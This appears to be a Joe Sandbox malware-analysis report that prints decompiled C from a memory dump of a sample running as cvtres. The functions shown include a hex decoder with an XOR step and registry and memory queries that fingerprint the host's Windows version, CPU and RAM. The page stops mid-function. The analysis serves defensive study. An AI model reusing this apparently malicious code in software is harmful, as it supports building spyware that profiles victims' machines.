                                                                    0x00409f66
                                                                    0x00409f67
                                                                    0x00409fd8
                                                                    0x00409fdf
                                                                    0x00409f69
                                                                    0x00409f69
                                                                    0x00409f6a
                                                                    0x00409fc9
                                                                    0x00409fd3
                                                                    0x00409fd5
                                                                    0x00409f6c
                                                                    0x00409f6d
                                                                    0x00409f73
                                                                    0x00409f78
                                                                    0x00409f7e
                                                                    0x00409f7e
                                                                    0x00409f80
                                                                    0x00409f81
                                                                    0x00409f81
                                                                    0x00409f8c
                                                                    0x00409fa7
                                                                    0x00409fb3
                                                                    0x00409fb8
                                                                    0x00409fbb
                                                                    0x00409fbb
                                                                    0x00409f6d
                                                                    0x00409f6a
                                                                    0x00409f67
                                                                    0x00409f60
                                                                    0x00409f59
                                                                    0x0040a038
                                                                    0x0040a050
                                                                    0x0040a052
                                                                    0x0040a055
                                                                    0x00409f4b
                                                                    0x0040a05d
                                                                    0x0040a062
                                                                    0x0040a068
                                                                    0x0040a068
                                                                    0x0040a06a
                                                                    0x0040a06b
                                                                    0x0040a06b
                                                                    0x0040a07c

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strtok_slstrcat
                                                                    • String ID: true
                                                                    • API String ID: 3150607157-4261170317
                                                                    • Opcode ID: de70d80f28d44038484b960b71a162ca22c95ffe38e6090770767b5173d637b5
                                                                    • Instruction ID: ab29309e79b87aa9ddf1a550bc7e0d759d8794b11dd3b590f3c75c699c02b645
                                                                    • Opcode Fuzzy Hash: de70d80f28d44038484b960b71a162ca22c95ffe38e6090770767b5173d637b5
                                                                    • Instruction Fuzzy Hash: 3F51933190025D8ADF24DB55CC54CEE77A8EF66345B4400FBE80AE72D1DE385E89CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040482E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E0040482E(void* __eax, intOrPtr* __ebx, signed int __ecx, void* __edi, intOrPtr* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t29;
				signed int _t30;
				intOrPtr _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t36;
				signed int _t39;
				signed int _t41;
				signed int _t42;
				void* _t44;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr* _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				signed int _t66;
				signed int _t67;
				signed int _t71;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr* _t79;
				intOrPtr _t80;
				void* _t82;
				signed int _t85;
				void* _t88;
				void* _t90;

				_t84 = __esi;
				_t66 = __ecx;
				_t60 = __ebx;
				_t88 = _t90;
				_push(__ecx);
				_push(__edi);
				_t82 = __eax;
				_t29 =  *((intOrPtr*)(__ebx + 0x10));
				if(_t29 < _a4) {
					_t30 = E0041CFED("invalid string position");
					asm("int3");
					_push(__ebx);
					_t61 = _v8;
					_push(__esi);
					_t85 = _t30;
					_t67 = _t85;
					if(E00404505(_t67, _v8) == 0) {
						_t32 =  *((intOrPtr*)(_t85 + 0x10));
						if((_t67 | 0xffffffff) - _t32 <= _t82) {
							_t32 = E0041CFA0("string too long");
						}
						if(_t82 != 0) {
							_t63 = _t32 + _t82;
							if(E004044A3(_t63, _t85, _t82, _t88, _t63, 0) != 0) {
								_t35 =  *((intOrPtr*)(_t85 + 0x14));
								if(_t35 < 0x10) {
									_t71 = _t85;
								} else {
									_t71 =  *_t85;
								}
								if(_t35 < 0x10) {
									_t36 = _t85;
								} else {
									_t36 =  *_t85;
								}
								E0041DCF0(_t36 + _t82, _t71,  *((intOrPtr*)(_t85 + 0x10)));
								if( *((intOrPtr*)(_t85 + 0x14)) < 0x10) {
									_t39 = _t85;
								} else {
									_t39 =  *_t85;
								}
								E00420090(_t39, _v8, _t82);
								 *((intOrPtr*)(_t85 + 0x10)) = _t63;
								if( *((intOrPtr*)(_t85 + 0x14)) < 0x10) {
									_t41 = _t85;
								} else {
									_t41 =  *_t85;
								}
								 *((char*)(_t41 + _t63)) = 0;
							}
						}
						_t33 = _t85;
					} else {
						if( *((intOrPtr*)(_t85 + 0x14)) < 0x10) {
							_t42 = _t85;
						} else {
							_t42 =  *_t85;
						}
						_t33 = E0040482E(_t82, _t85, _t67, _t82, _t85, _t61 - _t42);
					}
					return _t33;
				} else {
					_t44 = _t29 - _a4;
					if(_t44 < __eax) {
						_t82 = _t44;
					}
					_t45 =  *((intOrPtr*)(_t84 + 0x10));
					if((_t66 | 0xffffffff) - _t45 <= _t82) {
						_t45 = E0041CFA0("string too long");
					}
					if(_t82 != 0) {
						_v8 = _t45 + _t82;
						if(E004044A3(_t60, _t84, _t82, _t88, _t45 + _t82, 0) != 0) {
							_t49 =  *((intOrPtr*)(_t84 + 0x14));
							if(_t49 < 0x10) {
								_t75 = _t84;
							} else {
								_t75 =  *_t84;
							}
							if(_t49 < 0x10) {
								_t50 = _t84;
							} else {
								_t50 =  *_t84;
							}
							E0041DCF0(_t50 + _t82, _t75,  *((intOrPtr*)(_t84 + 0x10)));
							if(_t84 != _t60) {
								if( *((intOrPtr*)(_t60 + 0x14)) < 0x10) {
									_t53 = _t60;
								} else {
									_t53 =  *_t60;
								}
								if( *((intOrPtr*)(_t84 + 0x14)) < 0x10) {
									_t76 = _t84;
								} else {
									_t76 =  *_t84;
								}
								E00420090(_t76, _t53 + _a4, _t82);
							} else {
								_t80 = _a4;
								if(_t80 != 0) {
									_t80 = _t80 + _t82;
								}
								_t78 =  *((intOrPtr*)(_t84 + 0x14));
								if(_t78 < 0x10) {
									_t57 = _t84;
								} else {
									_t57 =  *_t84;
								}
								if(_t78 < 0x10) {
									_t79 = _t84;
								} else {
									_t79 =  *_t84;
								}
								E0041DCF0(_t79, _t57 + _t80, _t82);
							}
							_t77 = _v8;
							 *((intOrPtr*)(_t84 + 0x10)) = _t77;
							if( *((intOrPtr*)(_t84 + 0x14)) < 0x10) {
								_t56 = _t84;
							} else {
								_t56 =  *_t84;
							}
							 *((char*)(_t56 + _t77)) = 0;
						}
					}
					return _t84;
				}
			}


































                                                                    0x0040482e
                                                                    0x0040482e
                                                                    0x0040482e
                                                                    0x0040482f
                                                                    0x00404831
                                                                    0x00404832
                                                                    0x00404833
                                                                    0x00404835
                                                                    0x0040483b
                                                                    0x00404921
                                                                    0x00404926
                                                                    0x00404927
                                                                    0x00404928
                                                                    0x0040492c
                                                                    0x0040492d
                                                                    0x00404930
                                                                    0x00404939
                                                                    0x00404958
                                                                    0x00404962
                                                                    0x00404969
                                                                    0x00404969
                                                                    0x00404970
                                                                    0x00404972
                                                                    0x00404981
                                                                    0x00404983
                                                                    0x00404989
                                                                    0x0040498f
                                                                    0x0040498b
                                                                    0x0040498b
                                                                    0x0040498b
                                                                    0x00404994
                                                                    0x0040499a
                                                                    0x00404996
                                                                    0x00404996
                                                                    0x00404996
                                                                    0x004049a3
                                                                    0x004049af
                                                                    0x004049b5
                                                                    0x004049b1
                                                                    0x004049b1
                                                                    0x004049b1
                                                                    0x004049bd
                                                                    0x004049c9
                                                                    0x004049cc
                                                                    0x004049d2
                                                                    0x004049ce
                                                                    0x004049ce
                                                                    0x004049ce
                                                                    0x004049d4
                                                                    0x004049d4
                                                                    0x00404981
                                                                    0x004049d8
                                                                    0x0040493b
                                                                    0x0040493f
                                                                    0x00404945
                                                                    0x00404941
                                                                    0x00404941
                                                                    0x00404941
                                                                    0x0040494e
                                                                    0x0040494e
                                                                    0x004049dc
                                                                    0x00404841
                                                                    0x00404841
                                                                    0x00404846
                                                                    0x00404848
                                                                    0x00404848
                                                                    0x0040484a
                                                                    0x00404854
                                                                    0x0040485b
                                                                    0x0040485b
                                                                    0x00404862
                                                                    0x0040486f
                                                                    0x00404879
                                                                    0x0040487f
                                                                    0x00404885
                                                                    0x0040488b
                                                                    0x00404887
                                                                    0x00404887
                                                                    0x00404887
                                                                    0x00404890
                                                                    0x00404896
                                                                    0x00404892
                                                                    0x00404892
                                                                    0x00404892
                                                                    0x0040489f
                                                                    0x004048a9
                                                                    0x004048dd
                                                                    0x004048e3
                                                                    0x004048df
                                                                    0x004048df
                                                                    0x004048df
                                                                    0x004048e9
                                                                    0x004048ef
                                                                    0x004048eb
                                                                    0x004048eb
                                                                    0x004048eb
                                                                    0x004048f7
                                                                    0x004048ab
                                                                    0x004048ab
                                                                    0x004048b0
                                                                    0x004048b2
                                                                    0x004048b2
                                                                    0x004048b4
                                                                    0x004048ba
                                                                    0x004048c0
                                                                    0x004048bc
                                                                    0x004048bc
                                                                    0x004048bc
                                                                    0x004048c5
                                                                    0x004048cb
                                                                    0x004048c7
                                                                    0x004048c7
                                                                    0x004048c7
                                                                    0x004048d2
                                                                    0x004048d2
                                                                    0x004048fc
                                                                    0x00404906
                                                                    0x00404909
                                                                    0x0040490f
                                                                    0x0040490b
                                                                    0x0040490b
                                                                    0x0040490b
                                                                    0x00404911
                                                                    0x00404911
                                                                    0x00404879
                                                                    0x00404919
                                                                    0x00404919

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$Xinvalid_argumentstd::_
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 1771113911-4289949731
                                                                    • Opcode ID: fdf1746e18440054e3dbee6a8a20f800cd9884e385f5f1ca5fc8936b06fccb00
                                                                    • Instruction ID: 8cc0ea25ad7502a3dbebda752280076f74e667b351e9d4275c23165dc07a7114
                                                                    • Opcode Fuzzy Hash: fdf1746e18440054e3dbee6a8a20f800cd9884e385f5f1ca5fc8936b06fccb00
                                                                    • Instruction Fuzzy Hash: 6831B3F67002409BDA28EE6DC981A2BB3E6EBC17007244D3EE642A76C1D7389D41879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004112D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98memorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E004112D0(void* __ebx, void** __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t31;
				void* _t37;
				void* _t42;
				void* _t48;
				intOrPtr* _t51;
				signed int _t57;
				long _t74;
				void* _t77;

				_push(0x5c);
				E0042083E(E00433CA7, __ebx, __edi, __esi);
				_t31 =  *(_t77 + 8);
				_t76 = "0123456789ABCDEF";
				_t74 = _t77 - 0x24;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t77 - 0x60) = __ecx;
				_push(_t31);
				 *(_t77 - 0x68) = _t31;
				 *(_t77 - 0x64) =  *(_t77 + 0xc);
				asm("movsb");
				_t57 = 0;
				if( *0x446320() > 0) {
					_t76 =  *(_t77 - 0x68);
					_t37 = E0041F240(_t77 - 0x24,  *_t76);
					if(_t37 != 0) {
						_t74 = _t37 - _t77 - 0x24 << 4;
						_t42 = E0041F240(_t77 - 0x24, _t76[1]);
						if(_t42 == 0) {
							goto L2;
						} else {
							_t57 =  !(_t42 - _t77 - 0x00000024 + _t74 ^ 0xffffffa3) & 0x000000ff;
							_t13 =  *0x446320(_t76) - 1; // -1
							_t74 = _t13;
							 *( *(_t77 - 0x64)) = _t74;
							_t48 = HeapAlloc(GetProcessHeap(), 8, _t74);
							 *( *(_t77 - 0x60)) = _t48;
							if(_t48 == 0) {
								goto L2;
							} else {
								 *(_t77 - 0x30) =  *(_t77 - 0x30) & 0x00000000;
								 *((intOrPtr*)(_t77 - 0x2c)) = 0xf;
								 *((char*)(_t77 - 0x40)) = 0;
								E00404331(_t77 - 0x40, _t76);
								 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
								_t76 = _t77 - 0x5c;
								_t51 = E0040C034(_t77 - 0x40, _t77 - 0x5c, _t77 - 0x40, 2, 0xffffffff);
								if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
									_t51 =  *_t51;
								}
								E0041E192( *( *(_t77 - 0x60)), _t74, _t51);
								E00404354(_t77 - 0x5c, 1, 0);
								E00404354(_t77 - 0x40, 1, 0);
								goto L8;
							}
						}
					} else {
						L2:
					}
				}
				return E00420888(_t57, _t74, _t76);
			}











                                                                    0x004112d0
                                                                    0x004112d7
                                                                    0x004112dc
                                                                    0x004112df
                                                                    0x004112e4
                                                                    0x004112e7
                                                                    0x004112e8
                                                                    0x004112e9
                                                                    0x004112ea
                                                                    0x004112eb
                                                                    0x004112f1
                                                                    0x004112f2
                                                                    0x004112f5
                                                                    0x004112f8
                                                                    0x004112f9
                                                                    0x00411303
                                                                    0x00411309
                                                                    0x00411314
                                                                    0x0041131d
                                                                    0x0041132e
                                                                    0x00411338
                                                                    0x00411341
                                                                    0x00000000
                                                                    0x00411343
                                                                    0x00411351
                                                                    0x0041135d
                                                                    0x0041135d
                                                                    0x00411366
                                                                    0x0041136f
                                                                    0x00411378
                                                                    0x0041137c
                                                                    0x00000000
                                                                    0x0041137e
                                                                    0x0041137e
                                                                    0x00411386
                                                                    0x0041138d
                                                                    0x00411391
                                                                    0x00411396
                                                                    0x004113a2
                                                                    0x004113a5
                                                                    0x004113ae
                                                                    0x004113b0
                                                                    0x004113b0
                                                                    0x004113b9
                                                                    0x004113c8
                                                                    0x004113d4
                                                                    0x00000000
                                                                    0x004113d4
                                                                    0x0041137c
                                                                    0x0041131f
                                                                    0x0041131f
                                                                    0x0041131f
                                                                    0x0041131d
                                                                    0x004113e0

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 004112D7
                                                                    • lstrlen.KERNEL32(?,0000005C,00411449,?,?,00000024), ref: 004112FB
                                                                    • lstrlen.KERNEL32(?,?,?,00000024), ref: 00411357
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,00000024), ref: 00411368
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 0041136F
                                                                    • _strcpy_s.LIBCMT ref: 004113B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heaplstrlen$AllocH_prolog3_Process_strcpy_s
                                                                    • String ID: 0123456789ABCDEF
                                                                    • API String ID: 2514983032-2554083253
                                                                    • Opcode ID: 0c81044fe54157c0374c53d8f96f4fe9bfc3e1af1748c0dd9a59fe43b728177d
                                                                    • Instruction ID: 030344be54a23f71540a0a79728bca2daea75cc8dc98f352f0a43ebfd85a459b
                                                                    • Opcode Fuzzy Hash: 0c81044fe54157c0374c53d8f96f4fe9bfc3e1af1748c0dd9a59fe43b728177d
                                                                    • Instruction Fuzzy Hash: F031C0719003099FEB04EFA5DC45BDE77B8AF0A304F10002AFA15EB291DB79A948CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004148DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E004148DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t24;
				intOrPtr _t39;
				void* _t44;

				_push(0x14);
				E004207D5(E004338D8, __ebx, __edi, __esi);
				E0041D5BD(_t44 - 0x14, 0);
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t39 =  *0x446724; // 0x4be10a0
				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
				_t19 = E0040E116( *((intOrPtr*)(_t44 + 8)), E0040E063(_t44 - 0x14, 0x444ae8));
				_t43 = _t19;
				if(_t19 == 0) {
					if(_t39 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t24 = E0040E14B(__ebx, _t39, _t43, __eflags);
						__eflags = _t24 - 0xffffffff;
						if(_t24 == 0xffffffff) {
							E0041DC67(_t44 - 0x20, "bad cast");
							E0041FF86(_t44 - 0x20, 0x440cfc);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x446724 =  *((intOrPtr*)(_t44 - 0x10));
						E0040E094( *((intOrPtr*)(_t44 - 0x10)));
						E0041D21C(__eflags, _t43);
					} else {
						_t43 = _t39;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0041D5E5(_t44 - 0x14);
				return E00420874(_t43);
			}







                                                                    0x004148dc
                                                                    0x004148e3
                                                                    0x004148ed
                                                                    0x004148f2
                                                                    0x004148f6
                                                                    0x00414901
                                                                    0x0041490e
                                                                    0x00414913
                                                                    0x00414917
                                                                    0x0041491b
                                                                    0x00414921
                                                                    0x00414927
                                                                    0x00414928
                                                                    0x0041492f
                                                                    0x00414932
                                                                    0x0041493c
                                                                    0x0041494a
                                                                    0x0041494a
                                                                    0x0041494f
                                                                    0x00414954
                                                                    0x0041495a
                                                                    0x00414960
                                                                    0x0041491d
                                                                    0x0041491d
                                                                    0x0041491d
                                                                    0x0041491b
                                                                    0x00414966
                                                                    0x0041496d
                                                                    0x00414979

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004148E3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004148ED
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0041493C
                                                                    • __CxxThrowException@8.LIBCMT ref: 0041494A
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 0041495A
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 00414960
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: bad cast
                                                                    • API String ID: 158301680-3145022300
                                                                    • Opcode ID: 391bde52492a83ac6010bf03c4688ecf07c6551cc5cb3b4c4126b02a386acfdf
                                                                    • Instruction ID: 2eeb985915207f491d29b51f0ec2b0032bc232cb8e531018501302300e531e97
                                                                    • Opcode Fuzzy Hash: 391bde52492a83ac6010bf03c4688ecf07c6551cc5cb3b4c4126b02a386acfdf
                                                                    • Instruction Fuzzy Hash: 4E01CEB1D4022497CB00EB71C842AEE73A0AB84728F20066BE410B72D1EB7C9E4187CD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041527A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E0041527A(void* __edi, void* __esi) {
				void* __ebx;
				signed int _t15;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				signed int _t38;
				void* _t40;

				_t37 = __esi;
				_t36 = __edi;
				_t38 = _t40 - 0x18c;
				_t15 =  *0x443674; // 0x393162b1
				 *(_t38 + 0x188) = _t15 ^ _t38;
				 *(_t38 - 0x80) = 0xff;
				 *(_t38 + 0x88) = 0;
				E00426300(_t38 + 0x89, 0, 0xfe);
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119, _t38 - 0x7c) == 0) {
					RegQueryValueExA( *(_t38 - 0x7c), "ProductName", 0, 0, _t38 + 0x88, _t38 - 0x80);
				}
				RegCloseKey( *(_t38 - 0x7c));
				CharToOemA(_t38 + 0x88, _t38 - 0x78);
				_pop(_t32);
				return E0041DA9B(_t38 - 0x78, _t32,  *(_t38 + 0x188) ^ _t38, _t35, _t36, _t37);
			}











                                                                    0x0041527a
                                                                    0x0041527a
                                                                    0x0041527b
                                                                    0x00415288
                                                                    0x0041528f
                                                                    0x004152a5
                                                                    0x004152ac
                                                                    0x004152b2
                                                                    0x004152d6
                                                                    0x004152ed
                                                                    0x004152ed
                                                                    0x004152f6
                                                                    0x00415307
                                                                    0x00415318
                                                                    0x00415325

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 004152B2
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,00000001), ref: 004152CE
                                                                    • RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?,?,?,00000001), ref: 004152ED
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 004152F6
                                                                    • CharToOemA.USER32(?,?), ref: 00415307
                                                                    Strings
                                                                    • ProductName, xrefs: 004152E5
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004152C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                    • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 2235053359-1787575317
                                                                    • Opcode ID: afc4507dc89cf82fe62f1f22f56d1c040bf5a00c27ae694bebb319ef339ab5c0
                                                                    • Instruction ID: 4ec4cb7fb1befc7b243c6ab37bf2e476659b43eeef9c87b2870427e474bfdd8b
                                                                    • Opcode Fuzzy Hash: afc4507dc89cf82fe62f1f22f56d1c040bf5a00c27ae694bebb319ef339ab5c0
                                                                    • Instruction Fuzzy Hash: A81130B190014CAEDB30EFA0EC85FEE77ACAB19304F50802AB919D6152EF745A4C8B14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414F5B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E00414F5B(void* __edi, void* __esi) {
				void* __ebx;
				signed int _t15;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				signed int _t38;
				void* _t40;

				_t37 = __esi;
				_t36 = __edi;
				_t38 = _t40 - 0x18c;
				_t15 =  *0x443674; // 0x393162b1
				 *(_t38 + 0x188) = _t15 ^ _t38;
				 *(_t38 - 0x80) = 0xff;
				 *(_t38 + 0x88) = 0;
				E00426300(_t38 + 0x89, 0, 0xfe);
				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119, _t38 - 0x7c) == 0) {
					RegQueryValueExA( *(_t38 - 0x7c), "ProcessorNameString", 0, 0, _t38 + 0x88, _t38 - 0x80);
				}
				RegCloseKey( *(_t38 - 0x7c));
				CharToOemA(_t38 + 0x88, _t38 - 0x78);
				_pop(_t32);
				return E0041DA9B(_t38 - 0x78, _t32,  *(_t38 + 0x188) ^ _t38, _t35, _t36, _t37);
			}











                                                                    0x00414f5b
                                                                    0x00414f5b
                                                                    0x00414f5c
                                                                    0x00414f69
                                                                    0x00414f70
                                                                    0x00414f86
                                                                    0x00414f8d
                                                                    0x00414f93
                                                                    0x00414fb7
                                                                    0x00414fce
                                                                    0x00414fce
                                                                    0x00414fd7
                                                                    0x00414fe8
                                                                    0x00414ff9
                                                                    0x00415006

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00414F93
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,00000000), ref: 00414FAF
                                                                    • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,?,?,?,?,00000000), ref: 00414FCE
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00414FD7
                                                                    • CharToOemA.USER32(?,?), ref: 00414FE8
                                                                    Strings
                                                                    • ProcessorNameString, xrefs: 00414FC6
                                                                    • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00414FA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                    • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                    • API String ID: 2235053359-2804670039
                                                                    • Opcode ID: 6d7e922951126200fdd4c221a31543a53e9b49f9e0addd1b7ffd6bc123c9b53e
                                                                    • Instruction ID: 36636f6957cfb15491d970b2bb69a6a55df0de48c7cde731a852b8320a3d0e85
                                                                    • Opcode Fuzzy Hash: 6d7e922951126200fdd4c221a31543a53e9b49f9e0addd1b7ffd6bc123c9b53e
                                                                    • Instruction Fuzzy Hash: DC1130B190014CAEDB30DFA0EC85FEE776CAB09308F50803AB919D6152EF745A4C8B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004151AA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004151AA(void* __ebx, void* __esi) {
				signed int _v8;
				unsigned int _v64;
				signed int _v68;
				char _v76;
				void* __edi;
				signed int _t12;
				struct _MEMORYSTATUSEX* _t18;
				unsigned int _t19;
				unsigned int _t23;
				void* _t24;
				signed int _t25;
				void* _t29;
				CHAR* _t30;
				void* _t31;
				signed int _t32;

				_t31 = __esi;
				_t24 = __ebx;
				_t12 =  *0x443674; // 0x393162b1
				_v8 = _t12 ^ _t32;
				_t30 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				E00426300( &_v76, 0, 0x40);
				_t18 =  &_v76;
				_v76 = 0x40;
				GlobalMemoryStatusEx(_t18);
				if(_t18 != 1) {
					_t25 = 0;
					_t19 = 0;
				} else {
					_t23 = _v64;
					_t25 = (_t23 << 0x00000020 | _v68) >> 0x14;
					_t19 = _t23 >> 0x14;
				}
				wsprintfA(_t30, "%d MB", _t25);
				return E0041DA9B(_t30, _t24, _v8 ^ _t32, _t29, _t30, _t31, _t19);
			}


















                                                                    0x004151aa
                                                                    0x004151aa
                                                                    0x004151b0
                                                                    0x004151b7
                                                                    0x004151d1
                                                                    0x004151d9
                                                                    0x004151e1
                                                                    0x004151e5
                                                                    0x004151ec
                                                                    0x004151f5
                                                                    0x00415206
                                                                    0x00415208
                                                                    0x004151f7
                                                                    0x004151f7
                                                                    0x004151fd
                                                                    0x00415201
                                                                    0x00415201
                                                                    0x00415212
                                                                    0x00415229

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,0043C8DC), ref: 004151C2
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004151C9
                                                                    • _memset.LIBCMT ref: 004151D9
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 004151EC
                                                                    • wsprintfA.USER32 ref: 00415212
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
                                                                    • String ID: %d MB$@
                                                                    • API String ID: 3402858368-3474575989
                                                                    • Opcode ID: 089cfbfaf65fa7301573113a26009e7c866ebd4282e7d568f5f166b1e6f6bbb9
                                                                    • Instruction ID: 71902aa2354f955e535f1807a7470d30660cfcb32d5b128367d9949f688c8c48
                                                                    • Opcode Fuzzy Hash: 089cfbfaf65fa7301573113a26009e7c866ebd4282e7d568f5f166b1e6f6bbb9
                                                                    • Instruction Fuzzy Hash: 0901D6B5B00108ABDB04DFB4DC4AFAE77B8EB46704F55003AFA02E2281DA74D805875D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410CC2 Relevance: 10.8, APIs: 7, Instructions: 300stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E00410CC2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t115;
				char* _t117;
				char* _t118;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t142;
				void* _t152;
				void* _t154;
				void* _t156;
				void* _t159;
				intOrPtr* _t161;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr _t204;
				intOrPtr _t206;
				void* _t209;
				char* _t212;
				char* _t213;
				intOrPtr _t214;
				void* _t240;
				void* _t259;
				void* _t260;
				char* _t261;
				char* _t262;

				_t241 = __edi;
				_push(0x970);
